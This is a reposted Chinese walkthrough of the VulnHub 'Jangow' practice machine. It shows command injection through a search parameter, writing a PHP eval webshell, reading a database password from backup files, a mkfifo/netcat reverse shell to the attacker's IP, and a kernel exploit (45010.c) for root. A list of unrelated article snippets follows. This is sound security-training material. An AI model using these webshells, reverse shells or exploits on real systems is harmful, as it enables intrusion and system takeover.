Jangow

news2024/11/26 11:34:00

Jangow

1.环境准备

  • 靶场地址:https://www.vulnhub.com/entry/jangow-101,754/
  • 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式
  • 攻击机:kali(192.168.80.180)
  • 靶机:JANGOW(192.168.80.128)
  • 目标:提升为root权限获取root目录下的flag

2.信息收集

  • 确认目标IP

    arp-scan -l
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-S1ocEMj3-1684144765819)(D:\网安笔记\图片\image-20230514140211088.png)]

  • 扫描开放端口

    nmap -Pn -sV -p- -A 192.168.80.128
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-u7UUgrM8-1684144765820)(D:\网安笔记\图片\image-20230514140811129.png)]

    确认开放了21、80端口

3.寻找攻击点

  • 主页面

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sGLwBtWs-1684144765820)(D:\网安笔记\图片\image-20230514141404050.png)]

  • 访问site页面

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mjQFRDq6-1684144765821)(D:\网安笔记\图片\image-20230514141556982.png)]

  • 尝试点击不同页面,发现一个/site/busque.php?buscar=可以执行命令

    /site/busque.php?buscar=whoami
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mMUYmIlg-1684144765821)(D:\网安笔记\图片\image-20230514141654882.png)]

4.写入shell

  • 查看网站根目录

    /site/busque.php?buscar=pwd
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3Avqe8Gv-1684144765821)(D:\网安笔记\图片\image-20230514141833517.png)]

  • 向网站根目录写入webshell

    /site/busque.php?buscar=echo '<?php @eval($_POST['glc']); ?>' >> glc.php
    
  • 查看是否写入成功

    /site/busque.php?buscar=ls -la
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9vaNhfG3-1684144765822)(D:\网安笔记\图片\image-20230514142047759.png)]

  • 连接shell

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4md5cCqH-1684144765822)(D:\网安笔记\图片\image-20230514142201570.png)]

5.网站信息收集

  • 发现.backup文件,里面有数据库用户名和密码

    $username = "jangow01";
    $password = "abygurl69";
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gURKrKCm-1684144765822)(D:\网安笔记\图片\image-20230514143043132.png)]

  • 发现wordpress/config.php文件,里面也有用户名和密码

    $username = "desafio02";
    $password = "abygurl69";
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5S2RgaeA-1684144765823)(D:\网安笔记\图片\image-20230514143129895.png)]

6.尝试ftp登录

  • 使用之前翻到的两个账号密码分别尝试,结果.backup 文件中的可以登陆,翻看下没有什么有用的信息

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gEP2iyoi-1684144765823)(D:\网安笔记\图片\image-20230514143428154.png)]

7.获取交互式shell

  • 尝试常规的反弹shell,发现都不可以,可能是nc 不支持 -e 参数,这个时候可以使用 mkfifo 命令创建命名管道反弹shell;使用蚁剑在/var/www/html/site/下面新建shell.php文件,内容在下面

    <?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.80.180 443 >/tmp/f");?>
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0EVOY5KO-1684144765823)(D:\网安笔记\图片\image-20230514144306287.png)]

  • 攻击机开启443端口监听

    nc -lvvp 443
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-e0LOqjD8-1684144765824)(D:\网安笔记\图片\image-20230514144137556.png)]

  • 用浏览器去访问shell.php文件,成功反弹shell

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2FaWCN1j-1684144765824)(D:\网安笔记\图片\image-20230514144359081.png)]

  • 查看是否存在python环境

    whereis python
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YidwRR9q-1684144765824)(D:\网安笔记\图片\image-20230514144448627.png)]

  • 存在python环境,切换交互式shell

    python3 -c 'import pty;pty.spawn("/bin/bash")'
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YmpfEUvp-1684144765824)(D:\网安笔记\图片\image-20230514144519095.png)]

8.提权

  • 查看内核版本

    uname -a
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JOPvrSLG-1684144765825)(D:\网安笔记\图片\image-20230514144633064.png)]

  • 查看发行版本

    lsb_release -a
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZxlYGNCM-1684144765825)(D:\网安笔记\图片\image-20230514144704340.png)]

  • 内核版本为4.4.0-31,发行版本为Ubuntu16.04

  • 利用searchsploit工具搜索一下

    searchsploit ubuntu 4.4.0-31 
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hWqjEsKw-1684144765825)(D:\网安笔记\图片\image-20230514144902325.png)]

    searchsploit ubuntu 16.04 
    

    在这里插入图片描述

  • 我使用的是45010.c,将文件下载到本地

    searchsploit -m 45010.c
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LEF0bjY5-1684144765826)(D:\网安笔记\图片\image-20230514145120546.png)]

  • 在本地进行编译

    gcc 45010.c -o exp 
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GXxFjdqU-1684144765826)(D:\网安笔记\图片\image-20230514145258135.png)]

  • 上传exp文件到靶机,增加执行权限,然后执行

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bDLUoD8t-1684145162106)(D:\网安笔记\图片\image-20230514145438684.png)]

    chmod +x exp
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uJ6iQNVy-1684144765827)(D:\网安笔记\图片\image-20230514150413957.png)]

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/529436.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【电厂用 多功能数码显示 HJY-F931B/D交流三相电压继电器JOSEF约瑟】

用途 HJY系列数字式交流电压继电器为瞬时动作特性&#xff0c;用于发电机&#xff0c;变压器&#xff0c;输电线路的继电保护装 置中作为过压或欠压的闭锁启动元件。 安装结构 导轨安装9&#xff0c;导轨安装E两种结构方式&#xff0c;具体尺寸请参考外型尺寸图。特点 (1). 采…

局域网内使用的多人协同编辑文档的软件哪个好?对比5款主流平台

支持局域网内多人协同编辑文档的软件或平台哪个好&#xff1f;PingCode 、Confluence 等知识库工具和腾讯文档、飞书文档等都支持多人协作编辑&#xff0c;怎么选&#xff1f;这是企业团队在找文档管理工具最常见的问题。 支持局域网内协同编辑的软件可以分为两个大类&#xf…

azkaban介绍

目录 为什么需要工作流调度系统 什么是azkaban azkaban适用场景 azkaban特点 常见的工作流调度系统 azkaban和Ooize特性对比 azkaban的架构 azkaban调度的任务有可能有那些类型 总结 为什么需要工作流调度系统 一个完整的大数据分析系统&#xff0c;必然由很多任务单…

基于显扬科技3D视觉相机的医疗试管分拣系统

行业现状&#xff1a; 医疗试管分拣是医疗行业中的一个重要环节&#xff0c;指将医疗实验室或生物技术研究中的试管按照一定的规则进行分拣&#xff0c;并对试管的类型、位置、数量等信息进行识别和管理。 随着医疗技术的不断发展和诊断治疗的精细化&#xff0c;医疗试管分拣…

Python之selenium关于Chrome驱动位置和闪退的问题

目录 一、Chromedriver放置的位置二、浏览器闪退 一、Chromedriver放置的位置 背景&#xff1a;之前由于Chrome浏览器自动升级后&#xff0c;导致驱动与浏览器不匹配&#xff0c;自己也不知道问题出在哪儿&#xff0c;花费了我大量时间去排查&#xff0c;所以接下来记录一些。…

Linux ps -A 和 ps -ef

Linux ps &#xff08;英文全拼&#xff1a;process status&#xff09;命令用于显示当前进程的状态&#xff0c;类似于 windows 的任务管理器 ps -A | grep xx 显示xx所有的进程 ps -ef | grep xx 显示xx在一个终端的所有进程 注意这里ef 其实可以拆开理解 e 是显示所有进…

oracle报错ORA-12514

问题&#xff1a;oracle使用服务名orcl登录不成功&#xff0c;并且报错 ORA-12514, TNS:listener does not currently know of service requested in conn原因分析&#xff1a; ORA-12514 错误通常表示 Oracle 数据库监听器无法识别客户端请求的服务名称。这可能是由于以下原因…

什么是ERP、APS和MES

01 先来说说ERP与MES的区别 ERP&#xff1a;企业资源计划 一天中午&#xff0c;丈夫在外给家里打电话&#xff1a;“亲爱的老婆&#xff0c;晚上想带几个同事回家吃饭可以吗&#xff1f;”&#xff08;订货意向&#xff09; 丈夫&#xff1a;“6个人&#xff0c;我们7点左右回…

【计算机视觉】如何利用 CLIP 做简单的人脸任务?(含源代码)

文章目录 一、数据集介绍二、源代码 结果三、代码逐行解读 一、数据集介绍 CELEBA 数据集&#xff08;CelebFaces Attributes Dataset&#xff09;是一个大规模的人脸图像数据集&#xff0c;旨在用于训练和评估人脸相关的计算机视觉模型。该数据集由众多名人的脸部图像组成&a…

【MySQL】MySQL索引--聚簇索引和非聚簇索引的区别

文章目录 前言1.聚簇索引和非聚簇索引的概念2.两者详细介绍2.1 聚簇索引2.2 非聚簇索引 3. 两者的区别3.1 数据存储方式3.2 二级索引查询 前言 1.聚簇索引和非聚簇索引的概念 数据库表的索引从数据存储方式上可以分为聚簇索引和非聚簇索引两种。“聚簇”的意思是数据行被按照…

【Java|golang】1072. 按列翻转得到最大值等行数

给定 m x n 矩阵 matrix 。 你可以从中选出任意数量的列并翻转其上的 每个 单元格。&#xff08;即翻转后&#xff0c;单元格的值从 0 变成 1&#xff0c;或者从 1 变为 0 。&#xff09; 返回 经过一些翻转后&#xff0c;行与行之间所有值都相等的最大行数 。 示例 1&#…

使用TensorFlow构建,绘制和解释人工神经网络

使用 Python 进行深度学习&#xff1a;神经网络&#xff08;完整教程&#xff09; 使用TensorFlow构建&#xff0c;绘制和解释人工神经网络 总结 在本文中&#xff0c;我将展示如何使用Python构建神经网络&#xff0c;以及如何使用可视化和创建模型预测解释器向业务解释深度学习…

【PCIE】pcie设备协议分析和crash后定位

分析RP Headerlog在协议中位置 能力集寄存器协议字段 HeaderLog字段偏移以及各字段含义 headerLog和协议的对应入截图中内容 completer id就是完成的ID&#xff0c;对应的BDF &#xff0c;如下图 b5:00.0 AECap寄存器 其中 first error pointer 含义&#xff1a; 这里有专…

对于 Git 每一次提交的时间信息,什么是作者日期和提交者日期

文章目录 什么是作者日期和提交者日期如何查看作者日期和提交者日期方法 1方法 2方法 3 修改最近一次提交的时间 什么是作者日期和提交者日期 对于 Git 的每一次提交&#xff0c;在 TortoiseGit 和 IntelliJ IDEA 都可以看到这次提交的时间。但很多人不知道的是&#xff0c;Gi…

人脸识别2:Python实现人脸识别Face Recognition(含源码)

人脸识别2&#xff1a;Python实现人脸识别Face Recognition(含源码) 目录 人脸识别2&#xff1a;Python实现人脸识别Face Recognition(含源码) 1. 前言 2. 项目安装 3. 人脸识别系统 &#xff08;1&#xff09;人脸检测和关键点检测 &#xff08;2&#xff09;人脸校准 …

【数据结构与算法】布隆(Bloom Filter)过滤器

文章目录 1、什么是布隆过滤器2、布隆过滤器的使用场景3、布隆过滤器的原理3.1 数据结构3.2 空间计算3.3 增加元素3.4 查询元素3.5 修改元素3.6 删除元素 4、Redis集成布隆过滤器4.1 版本要求4.2 安装&编译4.2.1 下载插件压缩包4.2.2 解压4.2.3 编译插件 4.3 Redis集成4.3.…

《硅谷钢铁侠:埃隆·马斯克的冒险人生》成就21世纪的史诗

《硅谷钢铁侠&#xff1a;埃隆马斯克的冒险人生》成就21世纪的史诗 阿什利万斯&#xff08;Ashlee Vance&#xff09;&#xff1a;美国商业专栏作家、资深科技记者。 文章目录 《硅谷钢铁侠&#xff1a;埃隆马斯克的冒险人生》成就21世纪的史诗马斯克的超级公司摘录感悟梦 马斯…

免费SSL:阿里云SSL证书免费申请入口及流程开启HTTPS

阿里云SSL免费证书在哪申请&#xff1f;一个阿里云账号一年可以申请20张免费SSL证书&#xff0c;很多同学找不到免费SSL的入口&#xff0c;阿小云来详细说下阿里云SSL证书免费申请入口链接以及免费SSL证书申请流程&#xff0c;有同学反馈阿里云免费SSL证书没有了&#xff1f;错…

【Python共享文件】——Python快速搭建HTTP web服务实现文件共享并公网远程访问

文章目录 1. 前言2. 视频教程3. 本地文件服务器搭建3.1 python的安装和设置3.2 cpolar的安装和注册 4. 本地文件服务器的发布4.1 Cpolar云端设置4.2 Cpolar本地设置 5. 公网访问测试6. 结语 1. 前言 数据共享作为和连接作为互联网的基础应用&#xff0c;不仅在商业和办公场景有…

[离散数学]图论

图基本概念 点相同 边相同 $$ 有向图 无向图 邻接点 &#xff1a;两个结点有一条有(无)向边相关联 邻接边:关联与同一个结点 孤立结点: 不予任何结点相邻接的结点 握手定理 度数边的两倍 有向图的 出度和入度和边数 n个节点无向完全图边数 C n 2 1 2 n ( n − 1 ) C_n^2…